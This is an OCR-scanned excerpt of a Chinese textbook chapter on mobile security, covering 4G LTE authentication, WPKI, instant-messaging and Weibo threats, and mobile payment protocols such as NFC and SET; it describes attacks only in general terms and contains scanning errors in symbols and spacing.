4G 无 线 通信 网 络 安全 接 人 技术 在 进行 认证 时 分 为 
以 下 两 种 : 首次 接 入 的 认证 和 再 次 接 入 的 认证 。 

1. 首次 接 入 的 认证 

在 移动 通信 过 程 中 , 当 4G 用 户 设备 首次 接 入 无 线 
网 络 或 者 切换 接 入 时 ,为 了 保证 接 入 的 安全 性 ,就 需要 
进行 此 类 认证 。 

参与 首次 接 人 认证 和 密 钥 协 商 的 过 程 有 3 个 主体 : 

。 用 户 设备 (UE)。 和 希望 接 人 网 络 并 进行 数据 的 

传输 。 

。 移动 管理 实体 MME。 当 前 时 刻 用 户 所 在 区 域内 负责 对 UE 进行 认证 的 实体 。 

。 归属 用 户 服 务 器 (HSS)。UE 所 属 的 家 乡 实体 ,用 于 存储 并 管理 用 户 签约 数据 ,包括 

UE 的 位 置信 息 、 鉴 权 信息 、 路 由 信息 等 ,UE 与 HSS 之 间 保 存 有 共享 密 钥 K, 这 个 
密 钥 是 在 制造 USIM 时 一 次 性 写 入 的 ,并 且 受 到 USIM 卡 的 安全 机 制 保护 。 

在 认证 过 程 中 ,会 产生 并 使 用 认证 向 量 (Authentication Vector,AV)。AV 由 RAND、 
XRES、KASME、AUTN 4 个 参数 组 成 : 

。 RAND 是 随机 数 , 由 HSS 产生 。 

。 XRES(Expected Response, 预 期 响应 ) 是 MME 预期 会 收 到 的 、UE 的 响应 信息 ,用 
于 判断 用 户 返 回 的 响应 信息 是 否 合法 。 

KASME 是 用 于 计算 后 继 通 信 所 用 密 钥 的 基础 密 钥 ,由 K 通过 密 钥 生成 函数 生成 ， 
而 KSIASME 是 KASME 的 密 钥 标识 。 

。 AUTN(Authentication Token, 认 证 令 牌 ) 中 包括 了 消息 鉴 权 码 MAC 。 

在 认证 过 程 中 ,为 了 抵御 重 放 攻 击 ,UE 和 HSS 都 各 自 维持 一 个 序列 号 计数 器 SQN。 

。 HSS 维持 的 是 SQNass ,负责 为 每 一 个 生成 的 AV 产生 一 个 新 的 序列 号 SQN。 

。 UE 维持 的 是 SQNus ,用 于 保存 已 经 接收 的 AV 中 的 最 大 SQN 值 。 

具体 的 认证 流程 如 下 : 

(1) UE 向 MME 发 送 自己 的 身份 标识 符 IMSI、 所 属 HSS 的 IDass 标 识 等 身份 信息 , 表 
明 自 己 的 身份 ,请 求 接 入 。 

(2) MME 根据 请 求 IDass ,向 对 应 的 HSS 发 送 认 证 数据 请 求 , 在 请 求 中 包括 用 户 的 身 
份 信息 IMSI 与 本 服务 网 的 身份 信息 SNID。 

(3) HSS 收 到 认证 请 求 后 ,在 自己 的 数据 库 中 查找 IMSI 与 SNID, 验 证 这 两 个 实体 的 
合法 性 ,如 果 验 证 通过 , 则 生成 认证 向 量 组 AV(1, 2,…,z), 并 作为 认证 数据 应 答 发 回 
给 MME。 

(4) MME 收 到 应 答 后 ,存储 AV(1,2,…,n) ,并 从 中 选择 一 个 AV(7) ,提取 出 它 所 包含 
的 RANDG)、AUTN (i)、KASME (i) 等 数据 ,同时 为 KASME(i) 分 配 一 个 密 钥 标识 
KSIASME(i) ,最 后 向 UE 发 送 用 户 认证 请 求 , 包 括 了 认证 令 牌 AUTN(Cz) 。 
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(5) UE 收 到 认证 请 求 后 ,通过 提取 和 计算 AUTN(7) 中 的 相关 信息 ,计算 出 XMAC( 期 
待 的 鉴 权 值 ) ,比较 XMAC 和 认证 令 牌 AUTN(i) 中 的 MAC( 来 自 自己 的 HSS,MME 无 法 
伪造 ) 是 否 相 等 ,同时 检验 序列 号 SQN 是 否 在 正常 的 范围 内 ,以 此 对 接 入 的 网 络 进行 认证 ， 
如 果 认 证 通过 , 则 计算 出 RES(Ci ,并 将 RES(Ci) 发 送 给 MME, 和 否则 发 送 一 个 认证 拒绝 信息 
并 中 止 认证 流程 。 

(6) MME 将 收 到 的 RESCGD) 与 AV(GD) 中 的 XRES(CD 进 行 比 较 , 如 果 一 致 , 则 通过 该 UE 
的 认证 。 

(7) 在 双向 认证 都 完成 后 ,MME 与 UE 将 KASME() 作 为 基础 密 钥 ,根据 约定 的 算法 
推算 出 加 密 密 钥 CK 与 完整 性 保护 密 钥 IK ,随后 进行 保密 通信 。 

UE 通过 相关 过 程 的 开展 ,能 够 获得 代表 自己 临时 身份 的 信息 (GUTD ,此 后 采用 
GUTI 与 移动 网 络 进行 通信 。 

2. 再 次 接 入 的 认证 

4G 无 线 网 络 在 进行 接 入 时 可 能 会 存在 接 入 次 数 很 多 的 情况 ,在 这 种 情况 下 ,如 果 每 次 
接 入 认证 都 必须 执行 上 述 完整 的 过 程 ,那么 系统 承担 的 负载 就 会 很 重 ,进而 产生 认证 延 时 的 
问题 。 因 此 , 当 ME 再 次 接 入 时 ,可 以 采取 一 种 快速 认证 的 办 法 。 

在 首次 认证 完成 之 后 ,如 果 ME 想 再 次 接 入 同一 个 网 络 , 那 么 其 首次 认证 中 所 获得 的 
临时 身份 就 有 了 很 重要 的 作用 ,ME 可 以 使 用 临时 身份 接 入 。 这 样 ,不 仅 身份 信息 的 安全 性 
得 到 了 保证 ,同时 也 提升 了 接 入 的 速度 。 


7.6 移动 互联 应 用 安全 


7.6.1 无 线 公 钥 基础 设施 


WPKI 的 思想 来 源 于 公 钥 基础 设施 (PKI) , 它 将 互联 网 电子 商务 中 PKI 安全 机 制 移植 
到 无 线 网 络 环境 中 ,WPKI 是 一 套 遵 循 已 有 标准 的 密 钥 和 证 书 管理 的 平台 体系 。 移 动 网 络 
中 使 用 的 公开 密 钥 和 数字 证 书 都 是 由 WPKI 进行 管理 的 ,WPKI 可 以 建立 安全 可 信 的 无 线 
网 络 环境 ,方便 实现 交易 双方 信息 的 安全 传递 。 

WPKI 系统 是 WAP、WLAN、WVPN(Wireless Virtual Private Network, 无 线 虚拟 专 
用 网 ) 等 移动 安全 基础 设施 建设 所 必需 的 关键 性 产品 ,在 无 线 通信 和 无 线 网 络 两 大 领域 中 具 
有 广泛 的 应 用 前 景 。 

WPKI 主要 由 EE (End-Entity Application, 终端 实体 应 用 )、RA (Registration 
Authority ,注册 中 心 ) .CA(CCertification Authority, 认 证 中 心 ) 和 PKI Directory(PKI 目录 ) 
4 部 分 组 成 。 在 WPKI 的 应 用 模式 中 ,还 涉及 数据 提供 服务 器 .WAP 网 关 等 服务 设备 。 

移动 终端 UIM 即 为 终端 实体 应 用 程序 EE。 证 书 中 心 主要 负责 生成 证 书 、 颁 发 证 书 和 
刷新 证 书 等 。PKI 目录 库 是 证 书 发 布 服务 器 。 内 容 服 务 器 可 以 理解 为 服务 提供 商 ,负责 向 
用 户 提 供 内 容 服 务 。WAP 网 关 负 责 客户 和 服务 器 之 间 的 协议 转换 工作 。 

WPKI 工作 流程 如 图 7. 19 所 示 。 

由 图 7. 19 可 知 ,WPKI 工作 流程 可 以 分 为 两 部 分 ,虚线 的 上 半 部 分 实现 WAP 的 安全 
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到 WAP 网 关 服务 器 
安全 传输 / 


证 书 颁发 础 


图 7.19 WPKI 工 作 流 程 


连接 ,虚线 的 下 半 部 分 完成 WPKI 证 书 的 签发 。 具 体 的 流程 如 下 : 

(1) 用 户 利用 移动 终端 向 注册 中 心 (RA) 递 交 证 书 申请 。 

(2) RA 审查 用 户 递交 的 申请 ,审查 合格 后 将 申请 传递 给 认证 中 心 (CA) 。 

(3) CA 为 用 户 生成 一 对 密 钥 并 制作 证 书 ,并 将 证 书 传 回 RA。 

(4) CA 将 证 书 保存 于 证 书目 录 的 数据 库 中 , 供 所 有 在 线 用 户 查询 。 

(5) RA 保存 用 户 的 证 书 ,为 每 一 个 证 书生 成 一 个 对 应 的 URL ,并 将 该 URL 发 送 给 移 
动 终端 用 户 。 

(6) 在 线 网 络 服务 器 从 证 书目 录 服 务 器 处 下 载 证 书 列表 以 备 使 用 。 

(7) CA 颁发 的 证 书 为 移动 用 户 终端 和 WAP 网 关 之 间 建 立 安全 的 连接 。 

(8) WAP 网 关 和 在 线 网 络 服 务 器 之 间 建 立 起 安全 连接 ,保证 移动 用 户 终端 和 在 线 网 络 
服务 器 之 间 的 安全 通信 。 


7.6.2 即时 通信 安全 


即时 通信 (Instant Messaging,IM) 是 当前 非常 流行 的 通信 软件 ,如 QQ、 微 信 、MSN 等 ， 
目前 主流 的 IM 系统 大 多 采用 客户 /服务 器 的 网 络 通信 模式 ,用户 在 注册 获取 IM 账号 之 后 ， 
通过 IM 客户 端 (IM Client) 登 录 到 IM 服务 器 (IM Server) ,用 户 就 可 以 与 其 他 在 线 用 户 进 
行 即 时 通信 了 。 用 户 可 以 收发 即时 信息 ,传输 文件 ,还 可 以 进行 音频 .视频 交流 ,用 户 之 间 的 
通信 数据 可 以 直接 在 IM 客户 端 之 间 进 行 传输 ,也 可 以 通过 IM 服务 器 进行 转发 。 

即时 通信 的 广泛 使 用 也 可 能 会 直接 危害 用 户 的 信息 安全 。 下 面 介 绍 一 些 IM 的 安全 威 
胁 和 控制 方案 。 

通过 注册 名 字 ( 或 含义 ) 有 误导 性 的 IM 账号 来 冒充 别人 .骗取 通信 对 方 的 信任 , 套 取 有 
价值 的 信息 ,这 是 非常 低级 的 安全 问题 ,但 是 却 使 得 很 多 人 曾 上 当 受 骗 , 甚 至 遭受 了 严重 的 
经 济 损失 。 由 于 IM 的 移动 性 、 分 布 性 及 未 知 通信 对 象 的 因素 ,基于 PKI 的 证 书 身份 认证 是 
IM 身份 管理 的 最 佳 解决 方案 。 在 IM 中 使 用 PKI 身份 管理 的 最 大 困难 是 与 易 用 性 相 矛 盾 
的 问题 。 在 安全 电子 邮件 ,安全 Web 浏览 等 应 用 中 ,一 般 要 求 在 计算 机 上 安装 相应 的 证 书 。 
在 移动 计算 时 代 , 用 户 往 往 会 在 多 台 终 端 上 使 用 即时 通信 应 用 软件 ,如 果 每 次 都 要 重新 安装 
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证 书 ,操作 较为 复杂 。 

移动 应 用 (包括 即时 通信 ) 与 个 人 工作 和 生活 的 关系 越 来 越 紧 密 ,用 户 从 中 获取 便利 的 
同时 ,往往 付出 了 牺牲 个 人 隐私 信息 的 代价 。 部 分 服务 提供 商 为 拓展 业务 或 其 他 目的 ,在 用 
户 不 知道 的 情况 下 获取 用 户 通讯 录 、 短 信和 ,活动 范围 等 隐私 信息 。2017 年 7 月 ,甚至 暴 出 
HP 笔记 本 电脑 会 记忆 用 户 键盘 输入 的 丑闻 。 虽 然 隐私 信息 的 丢失 不 一 定 给 用 户 造成 直接 
损失 ,但 会 给 用 户 埋 下 很 大 的 安全 隐患 。 这 就 要 求 我 们 提高 警惕 ,不 要 安装 无 法 确定 安全 性 
的 软件 。 另 外 ,用 户 注册 的 信息 也 可 能 存在 被 泄露 的 问题 ,可 以 参考 敏感 信息 防 泄露 技术 。 

黑客 会 利用 即时 通信 平台 大 肆 搜 寻 网 民 数据 ,寻找 攻击 对 象 , 将 恶意 软件 在 用 户 毫 不 知 
情 的 情况 下 悄悄 地 安装 到 用 户 的 移动 站 。 这 些 恶 意 软件 会 伺机 窥视 用 户 行为 , 盗 取 关键 的 
信息 和 数据 。 当 前 不 少 IM 服务 器 提供 了 一 些 与 反 病 毒 软 件 相 结合 的 功能 ,比如 允许 用 户 
进行 配置 ,以 便 在 接收 到 文件 (包括 恶意 软件 ) 之 后 启动 反 病 毒 软 件 对 文件 进行 病毒 扫描 。 

由 于 用 户 的 不 当 行 为 ,可 能 让 自己 的 移动 站 成 为 僵尸 Cbot) ,或 是 被 植 人 键盘 记录 (key 
logger) 程 序 , 所 有 的 密码 均 会 被 窃 ,造成 经 济 上 的 损失 。 用 户 应 时 刻 保持 警觉 ,不 要 随意 单 
击 异常 的 链接 ,运行 异常 的 程序 。 

当前 主流 IM 应 用 的 一 个 很 大 的 安全 威胁 在 于 它们 开放 的 \ 不 安全 的 链接 。 除 了 在 注 
册 / 登 录 时 需要 进行 认证 之 外 ,这 些 主流 IM 很 少 采取 措施 来 保护 通信 链接 的 安全 ,包括 客 
户 端 与 服务 器 .客户 端 与 客户 端 以 及 服务 器 与 服务 器 之 间 的 链接 安全 。 这 就 使 得 攻击 者 可 
以 很 方便 地 截获 会 话 的 内 容 , 获 得 用 户 的 谈话 内 容 , 例 如 ,广泛 应 用 的 IM 系统 对 文本 聊天 
的 信息 都 是 不 加 密 的 ,而 仅 对 口令 加 密 ,因此 在 传输 阶段 文本 会 话 通信 或 者 音 /视频 通信 中 
的 信息 极 易 泄 露 ,利用 简单 的 网 络 嗅 探 软件 和 简单 的 协议 分 析 就 可 以 还 原 出 聊天 信息 。 某 
些 软件 可 以 监视 局 域 网 上 的 IM 行为 ,还 有 人 专门 针对 QQ 通信 协议 进行 了 前 析 。 攻 击 者 
可 以 进行 假扮 攻击 ,给 用 户 发 送 虚 假 的 消息 ,甚至 耗 尽 客户 端 或 服务 器 的 资源 而 使 它们 

在 保障 IM 系统 的 连接 安全 方面 ,针对 企业 的 IM 应 用 Yahoo Business Messenger 和 
Reuters Messaging 通过 使 用 128 位 的 安全 套 接 字 层 (Security Socket Layer,SSL) 加 密 来 保 
护 即 时 通信 连接 ,取得 了 一 定 成 效 。 但 是 仅 采用 SSL 不 能 有 效 地 保障 IM 的 安全 ,例如 ,由 
于 SSL 加 密 保护 的 信息 对 于 服务 器 端 来 说 是 可 见 的 ,并 且 SSL 主动 把 数据 流 分 帧 处 理 , 而 
不 理会 消息 的 边界 ,因此 也 就 无 法 提供 基于 消息 的 抗 抵赖 性 证 明 。Skype 可 以 加 密 所 有 端 
到 端 通话 和 即时 消息 。IM Secure 可 以 为 MSN 等 IM 应 用 提供 加 密 服务 , 它 为 用 户 创建 X. 
509 数字 证 书 ,利用 OpenSSL 库 进 行 密码 服务 ,即时 消息 中 的 文本 都 用 56 位 的 DES 密 钥 进 
行 加 密 。IM Secure 所 提供 的 安全 服务 在 一 定 程度 上 是 有 用 的 ,IM 系统 中 用 户 之 间 的 即时 
消息 是 机 密 的 。 但 是 ,IM Secure 也 存在 很 多 缺陷 .例如 ,加 密 强 度 不 足 ,一 些 控 制 信息 通信 
没有 经 过 加 密 等 。 


7.6.3 微 博 安全 


微 博 使 互联 网 更 加 深入 地 渗透 到 人 们 的 工作 和 生活 中 ,但 它 也 正 日 益 成 为 互联 网 病毒 
和 恶意 程序 的 新 载体 ,严重 影响 了 互联 网 的 正常 功能 ,给 用 户 带 来 了 极 大 的 不 便 和 困扰 。 特 
别 是 随 着 3G/4G 业务 的 推出 , 微 博大 规模 地 应 用 在 以 手机 为 终端 的 载体 上 , 因 其 即时 性 和 
随意 性 ,治理 难度 远大 于 传统 互联 网 ,攻击 目标 人 群 更 加 广泛 并 且 欺 骗 更 加 容易 。 
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社会 工程 学 是 一 种 有 效 的 网 络 攻击 手段 , 它 通过 利用 受害 者 的 信任 、 好 奇 心 \ 心 理 弱点 、 
本 能 反应 、 贪 焚 等 进行 欺骗 。 例 如 ,会 将 收 到 的 信息 和 资源 推荐 给 朋友 的 用 户 约 占 89%。 
因此 网 络 黑客 一 旦 利用 个 体 配合 、 身 份 伪造 等 攻击 技术 在 微 博 中 骗取 信任 ,大 多 数 的 安全 保 
护 措 施 将 形同虚设 。 这 需要 用 户 自身 提高 警惕 ,提高 自身 素质 ,避免 自身 受 损 , 更 应 该 避免 
对 他 人 进行 有 意 无 意 的 攻击 。 

因为 HTML 语言 允许 使 用 脚本 进行 简单 交互 ,入 侵 者 可 以 把 具有 恶意 目的 的 数据 / 代 
码 插入 在 远程 Web 页 面 的 HTML 代码 中 , 当 用 户 使 用 浏览 器 下 载 该 页 面 时 ,嵌入 在 该 页 面 
中 的 脚本 将 被 解释 执行 。 主 要 隐患 包括 屏蔽 页 面 特定 内 容 、 伪 造 页 面 信息 ,拒绝 服务 攻击 、 
获取 其 他 用 户 Cookie 中 的 敏感 数据 等 ,这 些 人 侵 手 段 还 可 能 与 其 他 漏洞 结合 ,实现 查看 系 
统 文件 .执行 系统 命令 ,修改 系统 设置 等 目的 。 为 此 ,用 户 需要 强化 自律 意识 ,提高 自身 防范 
敏感 度 ,对 于 可 疑 的 网 页 .链接 尽量 不 要 去 接触 和 访问 。 例 如 ,AJAX 是 一 种 创建 交互 式 网 
页 的 应 用 开发 技术 。 如 果 编 写 了 没有 经 过 严谨 设计 的 AJAX 应 用 程序 ,它们 会 比 传统 桌面 
程序 存在 更 多 的 安全 风险 和 技术 漏洞 ,AJAX 蠕虫 可 以 利用 自动 转载 的 功能 不 断 地 在 微 博 
用 户 的 计算 机 间 进 行 传播 ,很 容易 造成 严重 的 危害 。 

另外 ,用 户 应 该 设立 独立 的 密码 ,以 防止 微 博 账号 密码 泄露 后 ,对 其 他 应 用 的 账号 产生 
威胁 ; 用 户 在 发 布 微 博时 ,不 要 发 布 带 有 个 人 人 敏感 信息 的 内 容 ( 如 带 有 个 人 敏感 信息 的 文字 
或 图 片 ); 用 户 还 应 该 对 征 博 设置 安全 提醒 ,每 当 用 户 账号 进行 重要 操作 时 , 微 博 平台 会 通 
过 邮件 或 手机 短信 的 形式 及 时 发 送 提醒 消息 给 用 户 , 用 户 可 以 完全 地 掌握 自己 的 账号 。 

微 博 的 信息 质量 也 因 其 信息 发 布 的 随时 随意 性 而 受到 质疑 。 由 于 部 分 微 博 用户 的 不 负 
责任 或 炒作 , 微 博 中 的 信息 不 仅 质量 无 法 保证 ,而 且 由 于 微 博 的 发 布 没 有 审核 机 构 , 没 有 人 
对 内 容 的 真 假 对 错 进行 控制 ,其 信息 的 可 靠 性 和 真实 性 无 从 验证 。 加 上 信息 传播 过 于 迅速 ， 
使 得 一 些 严重 失实 的 虚假 信息 常常 充斥 于 微 博 中 。 更 有 其 者 , 微 博 一 旦 被 敌对 国家 或 组 织 
利用 ,势必 会 变 为 造谣 惑 众 和 内 外 通信 指挥 的 工具 。 从 政策 上 ,国家 应 该 健全 网 络 法 律 法 
规 ,加 强 监控 ,净化 网 上 信息 ,加 大 违法 行为 的 打击 力度 ,利用 行政 、 法 律 手段 管理 网 站 ,特别 
是 需要 对 微 博 平台 进行 规范 和 约束 。 从 技术 上 , 微 博 平台 在 产品 运营 过 程 中 需要 对 一 些 相 
关 技 术 和 服务 措施 进行 完善 ,比如 进行 模式 识别 /信息 匹配 等 ,以 发 现 和 删除 可 信和 度 低 的 帖 
子 、 恶 意 字 符 串 等 。 大 力 推进 实名 制 工 作 也 是 重要 的 手段 ,能 够 有 效 地 防止 利用 网 络 匿名 恶 
意 侵 害 他 人 名 誉 .散布 谣言 和 制造 恺 慌 等 犯罪 活动 。 

很 多 微 博 产品 本 身 在 系统 安全 性 保护 .用户 隐私 数据 保护 .系统 稳定 运行 方面 有 着 比较 
大 的 安全 漏洞 。 因 为 商家 对 个 人 信息 安全 应 具有 保护 的 责任 , 微 博 平台 应 该 利用 多 种 防范 
技术 (例如 防火 墙 .防水 墙 等) 加 强 对 内 对 外 的 安全 防御 能 力 ,升级 账号 安全 保护 等 级 ,加 强 
微 博 安 全 和 个 人 信息 安全 保护 措施 。 其 中 实行 用 户 身份 双重 认证 是 一 个 较 好 的 办 法 。 双 重 
认证 是 指 除了 账户 密码 外 ,用 户 需 要 输入 另 一 个 代码 才能 进入 账户 ,这 个 代码 由 用 户 通过 其 
他 电子 设备 获取 ,每 次 登录 时 都 不 能 相同 。 另 外 , 微 博 平 台 的 运营 网 站 在 推出 新 的 微 博 产品 
之 前 ,首先 要 保证 产品 的 安全 ,需要 对 自己 的 产品 进行 严格 的 测试 。 


7.6.4 移动 支付 安全 


由 于 移动 支付 是 基于 无 线 通信 的 手段 .在 给 人 们 的 生活 带 来 方便 和 快捷 的 同时 ,其 安全 
性 也 受到 越 来 越 多 的 关注 。 
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通常 ,移动 支付 系统 (Mobile Payment System,MPS) 框 架 有 前 端 和 后 台 之 分 ,并 且 系 统 
往往 有 两 个 前 端 , 即 商 家 和 客户 。 客 户 的 前 端 是 运行 在 手持 设备 上 的 软件 和 应 用 程序 ,而 后 
台 负 责 处 理 支付 请 求 和 账户 处 理 。 

在 一 个 简单 的 MPS 中 ,一 般 有 3 个 部 分 进行 交互 : 客户 、 商 家 、FSP(Financial Service 
Provider, 金 融 服务 提供 者 )。 图 7. 20 是 简单 的 MPS 的 抽象 模型 。 

















客户 | “| MPS 的 支付 平台 | 一 一 | 金融 服务 提供 者 (FSP) 


| 


商家 























7.20 MPS 的 抽象 模型 


根据 支付 者 和 受 付 者 在 支付 过 程 中 是 否 处 于 同一 地 理 位 置 ,移动 支付 可 以 分 为 以 下 
两 种 : 
。 近 距 离 支付 。 一 般 采 用 RFID( 无 线 射 频 技 术 )、NFC(Near Field Communication , 近 
距离 通信 )、SIMPass 等 技术 实现 。 当 前 , 越 来 越 多 的 支付 过 程 是 通过 非 接 触 的 手机 
与 POS 终端 之 间 的 交互 来 完成 的 ,该 业务 中 的 手机 与 一 张 非 接触 式 金融 卡 相同 , 近 
距离 支付 的 典型 场景 是 用 户 到 商店 购物 。 
。 和 远 距 离 支 付 。 是 指 移动 支付 的 用 户 通 过 移动 终端 上 的 商业 客户 端 软件 或 浏览 器 选 
定 商品 后 ,支付 应 用 客户 端 (或 支付 插件 ) 与 后 台 移动 支付 平台 连接 并 进行 支付 。 远 
距离 支付 的 典型 场景 是 用 户 上 网 购物 。 远 距离 支付 主要 有 微 信 支付 ,京东 支付 、 支 
付 宝 支付 等 。 
随 着 移动 电子 业务 的 发 展 , 移 动 支付 面临 来 自 互联 网 和 移动 通信 系统 的 各 种 安全 性 攻 
击 所 产生 的 风险 。 这 些 风险 主要 包括 主动 攻击 和 被 动 攻击 。 其 中 ,主动 攻击 利用 对 数据 进 
行 算 改 伪造 .拒绝 服务 等 方式 ,试图 干扰 整个 移动 支付 系统 的 运行 ,以 达到 对 移动 支付 系统 
的 破坏 或 其 他 目的 ; 被 动 攻击 是 指 攻击 者 以 非法 身份 监听 或 监测 通信 网 络 中 的 信息 ,对 系 
统 资 源 利用 不 产生 干扰 ,而 是 试图 窃取 移动 通信 系统 中 传输 的 信息 。 
为 了 使 移动 支付 能 够 安全 进行 ,移动 支付 系统 必须 满足 的 安全 要 求 如 下 : 
。 信息 的 有 效 性 。 移 动 支付 以 无 线 通 信 为 载体 ,在 移动 支付 过 程 中 ,电子 信息 取代 了 
纸 质 信息 ,这 就 需要 保证 电子 形式 信息 的 有 效 性 ,因此 ,需要 保证 在 发 生 网 络 故障 、 
系统 软件 错误 ,操作 错误 等 情况 下 交易 数据 的 有 效 性 。 
。 信息 的 机 密 性 。 用 户 在 进行 交易 的 过 程 中 ,保证 其 信息 不 被 非 授 权 的 人 或 实体 非法 
窃取 ,并 确保 只 有 合法 的 用 户 才能 看 到 用 户 数据 。 
。 数据 的 完整 性 。 防 止 买 卖 双 方 和 支付 平台 之 间 传 送 的 机 密 信息 和 数据 在 传输 过 程 
中 遭 到 恶意 自 改 。 
。 信息 的 不 可 否认 性 。 主 要 用 于 防止 发 送 方 或 接收 方 对 所 传送 的 信息 进行 抵赖 ,如 果 
在 信息 发 布 合 同 签署 支付 等 关键 交易 步骤 时 ,接收 方 或 发 送 方 有 一 方 子 以 否认 ， 
则 另 一 方 可 以 给 出 已 签名 的 记录 作为 依据 要 求 仲裁 。 
。 操作 过 程 的 原子 性 。 即 支付 过 程 要 么 完全 成 功 ,要 么 什么 影响 也 不 产生 。 例 如 不 能 
产生 支付 完毕 ,但 是 产品 还 没有 被 售 出 的 情况 ,反之 亦 然 。 
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近 距 离 支付 是 当前 移动 支付 的 一 个 关注 点 ,而 NFC 是 其 关键 技术 之 一 。NFC 由 RFID 
演变 而 来 ,是 由 飞利浦 .诺基亚 和 Sony 等 公司 共同 研发 的 短 距离 高 频 无 线 电 技术 ,在 
13. 56MHz 频率 的 有 效 通 信和 距离 为 20cm, 目 前 已 有 多 款 手 机 支持 NFC 技术 ,可 以 实现 移动 
设备 与 电子 设备 之 间 的 非 接触 式 点 对 点 数据 传输 。NFC 虽然 传输 数据 距离 较 近 ,但 相对 于 
蓝牙 ,红外 等 技术 具有 较 高 的 安全 性 ,已 经 在 移动 支付 领域 得 到 了 越 来 越 多 的 关注 。 

相 比 其 他 移动 支付 手段 ,NFC 技术 具有 更 高 的 安全 性 以 及 更 快 的 支付 速度 ,只 要 将 支 
持 NFC 的 手机 靠近 读 卡 器 , 便 可 以 快捷 、 省 时 地 实现 移动 支付 。 

NFC 技术 最 为 典型 的 有 3 种 使 用 模式 : 

。 非 接 触 卡 模拟 模式 (card emulation mode)。 此 时 的 NFC 设备 具有 智能 卡 的 功能 ， 

可 以 在 短 距离 内 实现 安全 的 非 接触 式 加 密 信息 交换 。 此 时 的 工作 模式 为 被 动 模式 ， 
其 功能 仅仅 相当 于 RFID 标签 。 智 能 手机 用 户 使 用 的 移动 支付 就 是 采用 了 NFC 的 
卡 模拟 模式 。 这 种 模式 被 认为 是 未 来 移动 支付 发 展 的 一 个 重要 方向 。 

。 读 写 器 模式 (reader mode)。NFC 终端 可 以 当 作 一 个 需要 电源 的 非 接触 式 读 写 器 ， 
此 时 NFC 设备 既 可 以 作为 数据 接收 方 , 在 有 效 距 离 以 内 发 出 射频 , 读 取 NFC 标签 ， 
也 可 以 作为 数据 发 送 方 ,向 NFC 标签 写 人 信息 数据 。 此 时 NFC 工作 在 主动 模 
式 下 。 

。 点 对 点 模式 (peer to peer mode)。 两 个 距离 很 近 的 NFC 设备 之 间 可 以 快速 建立 连 
接 , 完 成 数据 交换 ,例如 发 送 图 片 、 同 步 设备 文件 等 。 

对 于 涉及 金融 支付 的 敏感 应 用 ,NFC 还 应 该 添加 加 密 技术 ,例如 3DES 和 高 级 加 密 标 
准 (AES) ,以 保证 使 用 者 的 利益 。 

在 移动 支付 领域 ,可 参考 的 安全 标准 有 许多 ,例如 信息 安全 等 级 保护 系列 安全 标准 、 
PCI 系列 安全 标准 、FIPS140-2 安全 标准 .EMV 安全 标准 ISO/IEC 14443 安全 标准 ,移动 
支付 安全 规范 等 ,有 兴趣 的 读者 可 以 自己 查阅 。 

由 于 传统 的 移动 支付 方式 非常 不 安全 ,为 了 提高 传输 秘密 信息 的 安全 性 ,有 学 者 提出 了 
使 用 SSL(5. 5 节 进 行 了 详细 介绍 ) 来 保证 秘密 信息 在 网 络 上 能 够 安全 传输 。SSL 确保 用 户 
的 客户 端 与 服务 器 间 进 行 信息 传递 时 秘密 信息 不 会 被 不 法 分 子 窃取 或 算 改 ,从 而 保证 移动 
支付 的 安全 性 。 但 是 SSL 不 能 保证 移动 支付 参与 方 的 不 可 和 否认 人 性, 而且 用 户 的 私有 信息 也 
被 暴露 给 了 商家 。 于 是 相关 组 织 机 构 提出 了 SSL 协议 的 改进 协议 SET 协议 来 解决 这 些 问 
题 ,SET 协议 作为 国际 标准 被 广泛 推广 。 

SET 协议 是 由 美国 Visa 和 MasterCard 两 大 信用 卡 组 织 联合 国际 上 多 家 机 构 共 同 制 
定 的 在 线 交易 安全 标准 ,该 标准 的 主要 目的 是 保障 消费 者 的 信用 卡 在 线 购物 的 安全 性 。 它 
采用 的 技术 有 对 称 密 钥 /公开 密 钥 加 密 、 喻 希 算法 、 数 字 签 名 技术 等 。 

SET 协议 需要 持 卡 人 和 商家 相互 认证 ,确定 通信 双方 身份 ,一 般 由 认证 中 心 为 双方 提 
供 信用 担保 。SET 协议 使 信用 卡 信息 和 订单 信息 隔离 ,订单 送 到 商家 时 ,商家 只 能 看 到 订 
单 信息 ,看 不 到 信用 卡 信息 ,保证 了 信息 的 机 密 性 和 完整 性 。 

SET 安全 协议 的 功能 如 下 : 

。 信息 保密 。 在 实现 网 上 交易 时 ,银行 必须 保护 用 户 的 银行 卡 信息 ,未 被 授权 者 不 能 

看 到 ,同时 要 采取 安全 措施 保证 结算 信息 在 网 络 上 的 安全 传输 ,防止 银行 卡号 和 密 
码 等 重要 信息 被 他 人 截获 。SET 协议 采用 了 加 密 技 术 数字 信封 等 措施 保证 传输 
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过 程 中 信息 的 安全 性 。 

。 信息 完整 性 。 需 防止 信息 在 传输 过 程 中 被 自 改 ,如 果 任 何 信 息 在 传送 中 被 自 改 , 交 
易 将 无 法 正确 地 进行 。 可 以 利用 数字 摘要 技术 ,确保 接收 方 收 到 的 信息 与 发 送 方 发 
出 的 信息 内 容 相 同 。 

。 完成 身份 认证 。 在 网 上 进行 任何 交易 时 ,都 须 事 先 确认 参与 各 方 的 真实 身份 信息 ， 
商家 要 确认 客户 的 银行 卡号 和 密码 信息 是 否 真实 ,客户 要 确认 该 商家 是 否 值 得 信 
赖 ,等 等 。 身 份 认 证 的 过 程 可 以 通过 数字 证 书 和 认证 中 心 完成 。 

SET 安全 协议 的 参与 方 包括 : 

。 用 户 。 包 括 个 人 用 户 和 团体 用 户 ,按照 在 线 商店 的 要 求 填写 订货 单 ,使 用 发 卡 银行 
发 行 的 信用 卡 进 行 付款 。 

。 在 线 商 店 。 提 供 商 品 或 服务 ,具备 相应 电子 货币 使 用 的 条 件 。 

。 收 单 银行 。 通 过 支付 网 关 完 成 消费 者 和 在 线 商 店 之 间 的 交易 支付 过 程 。 

。 认证 中 心 。 负 责 对 交易 双方 的 身份 进行 确认 , 即 对 厂商 的 信誉 度 和 消费 者 的 支付 能 
力 进行 认证 。 

SET 安全 协议 的 工作 流程 图 如 图 7. 21 所 示 。 














客户 粳 衣 支付 网 关 收 款 银行 
认证 中 心 发 卡 银行 




















7.21 SET 安全 协议 的 工作 流程 


(1) 客户 提交 订单 信息 前 ,还 需要 将 签名 加 密 的 委托 书 ( 包 含 用 户 的 银行 卡 信息 ) 交 给 
商家 。 

(2) 商家 无 法 获知 用 户 的 信用 卡号 ,所 以 向 自己 的 收 款 银行 发 起 校 验 请 求 , 收 款 银行 可 
以 解密 后 获取 用 户 的 银行 卡号 并 进行 认证 。 

